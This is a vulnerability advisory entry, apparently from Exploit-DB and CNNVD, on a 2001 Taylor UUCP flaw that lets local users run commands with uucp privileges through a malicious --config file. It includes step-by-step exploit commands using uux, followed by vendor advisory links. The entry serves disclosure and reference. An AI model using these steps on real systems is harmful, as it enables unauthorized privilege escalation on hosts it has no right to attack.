https://www.exploit-db.com/exploits/21106
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200112-124

TaylorUUCP包中的uuxqt不能正确的删除危险超长选项，本地用户通过调用uux且指定带有–config选项的交替配置文件提升特权。

source: http://www.securityfocus.com/bid/3312/info

Taylor UUCP is an implementation of the UUCP package written originally by Ian Lance Taylor.

A problem has been discovered in Taylor UUCP that makes it possible for local users to gain elevated privileges. The problem is due to the handling of configuration files when passed to uucp via the --config flag. When uux receives a request to execute commands using a malicious --config file, the commands will be executed with the privileges of uuxqt, a setuid uucp daemon by default.

This makes it possible for a local user to gain elevated privileges, and could lead to a local user gaining administrative access. 

uux 'uucp --config=/tmp/vv.v /tmp/somefile /tmp/someotherfile'

will use the supplied configuration, without dropping privileges.

1) Make a configuration file that allows any command to be executed, and allows files from anywhere to be copied to anywhere that is writable by uid/gid uucp. ( /tmp/config.uucp )
2) Make a command file with the command you want to be executed.
( /tmp/commands.uucp )
3) Do something like the following:

$ THISHOST=`uuname -l`
$ WHEREYOUWANTIT=/var/spool/uucp/${THISHOST}/X./X.${THISHOST}X1337
$ uux 'uucp --config=/tmp/config.uucp /tmp/commands.uucp '${WHEREYOUWANTIT}

The commands in /tmp/commands.uucp file will be executed by uuxqt, with the uid/gid of uucp.

来源:BID
名称:3312
链接:http://www.securityfocus.com/bid/3312
来源:CALDERA
名称:CSSA-2001-033.0
链接:http://www.calderasystems.com/support/security/advisories/CSSA-2001-033.0.txt
来源:CONECTIVA
名称:CLA-2001:425
链接:http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio;=000425
来源:BUGTRAQ
名称:20010908Multiplevendor’TaylorUUCP’problems.
链接:http://www.securityfocus.com/archive/1/212892
来源:BUGTRAQ
名称:20011130Redhat7.0localroot(viauucp)(attempt2)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=100715446131820
来源:XF
名称:uucp-argument-gain-privileges(7099)
链接:http://xforce.iss.net/static/7099.php
来源:SUSE
名称:SuSE-SA:2001:38
链接:http://www.novell.com/linux/security/advisories/2001_038_uucp_txt.html
来源:DEBIAN
名称:DSA-079
链接:http://www.debian.org/security/2001/dsa-079
来源:REDHAT
名称:RHSA-2001:165
链接:http://rhn.redhat.com/errata/RHSA-2001-165.html